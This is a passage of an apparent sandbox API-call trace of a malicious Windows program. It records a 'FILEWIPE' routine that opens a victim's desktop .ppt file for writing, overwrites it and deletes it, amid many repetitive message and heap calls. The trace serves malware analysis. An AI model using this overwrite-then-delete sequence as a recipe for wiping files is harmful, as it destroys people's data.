wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.283] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0075.283] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.283] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.283] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt", lpFindFileData=0x61e858 | out: lpFindFileData=0x61e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d1bc810, ftCreationTime.dwHighDateTime=0x1d5e129, ftLastAccessTime.dwLowDateTime=0x37bccaf0, ftLastAccessTime.dwHighDateTime=0x1d5e705, ftLastWriteTime.dwLowDateTime=0x37bccaf0, ftLastWriteTime.dwHighDateTime=0x1d5e705, nFileSizeHigh=0x0, nFileSizeLow=0x1267f, dwReserved0=0x0, dwReserved1=0x657690, cFileName="dU_Aud-fZ3ji9.ppt", cAlternateFileName="DU_AUD~1.PPT")) returned 0x6b89f8 [0075.283] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0075.284] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.284] CharLowerBuffW (in: lpsz="byte[75391]", cchLength=0xb | out: lpsz="byte[75391]") returned 0xb [0075.284] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.285] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0075.285] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.285] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0075.285] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f90000 [0075.285] FreeLibrary (hLibModule=0x76f90000) returned 1 [0075.285] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.285] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.285] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.285] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0075.285] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.285] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.285] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.285] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.285] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.285] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.285] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.285] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.285] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.285] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.285] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.285] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.285] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.286] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.286] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.286] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.286] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0075.286] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.286] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\du_aud-fz3ji9.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0075.286] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.286] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.286] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.287] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.287] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0075.287] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.287] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.287] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.287] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.287] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.287] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.287] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.287] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.287] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0075.287] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.287] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.287] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.288] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.288] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.288] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.288] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.288] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt", nBufferLength=0x7fff, lpBuffer=0x60ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt", lpFilePart=0x0) returned 0x49 [0075.288] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt", lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d1bc810, ftCreationTime.dwHighDateTime=0x1d5e129, ftLastAccessTime.dwLowDateTime=0x37bccaf0, ftLastAccessTime.dwHighDateTime=0x1d5e705, ftLastWriteTime.dwLowDateTime=0xc9a540e0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x1267f, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="dU_Aud-fZ3ji9.ppt", cAlternateFileName="DU_AUD~1.PPT")) returned 0x6b89f8 [0075.288] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\du_aud-fz3ji9.ppt")) returned 1 [0075.290] FindNextFileW (in: hFindFile=0x6b89f8, lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d1bc810, ftCreationTime.dwHighDateTime=0x1d5e129, ftLastAccessTime.dwLowDateTime=0x37bccaf0, ftLastAccessTime.dwHighDateTime=0x1d5e705, ftLastWriteTime.dwLowDateTime=0xc9a540e0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x1267f, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="dU_Aud-fZ3ji9.ppt", cAlternateFileName="DU_AUD~1.PPT")) returned 0 [0075.290] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0075.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d730 | out: hHeap=0x650000) returned 1 [0075.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0075.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6998e0 | out: hHeap=0x650000) returned 1 [0075.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0075.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0075.290] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0075.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0075.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b480 | out: hHeap=0x650000) returned 1 [0075.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0075.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0075.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0075.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0075.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0075.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0075.293] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9c8 [0075.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0075.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0075.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0075.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0075.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0075.293] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.293] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.293] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.293] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0075.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.293] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.293] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0075.293] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690980 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0075.294] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ab50 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0075.294] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.294] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.294] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0075.294] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.294] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0075.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0075.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0075.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.295] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0075.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.295] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0075.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0075.296] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.296] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.296] HeapFree (in: hHeap=0x650000, 